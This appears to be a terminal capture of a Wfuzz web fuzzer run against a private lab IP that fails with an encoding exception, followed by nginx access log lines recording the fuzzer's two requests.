Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.100?FUZZ/
Total requests: 1

==================================================================
ID Response Lines Word Chars Payload
==================================================================


Unhandled exception: unknown encoding: utf-8,gbk
-----------------------------------------------
❯ tail -f /var/log/nginx/access.log
192.168.60.213 - - [27/Feb/2025:14:31:02 +0800] "GET /?08c391c2d775390f54ee859d7395ac68/// HTTP/1.1" 200 1859 "-" "Wfuzz/2.3.4"
192.168.60.213 - - [27/Feb/2025:14:31:58 +0800] "GET /?08c391c2d775390f54ee859d7395ac68/// HTTP/1.1" 200 1859 "-" "Wfuzz/2.3.4"
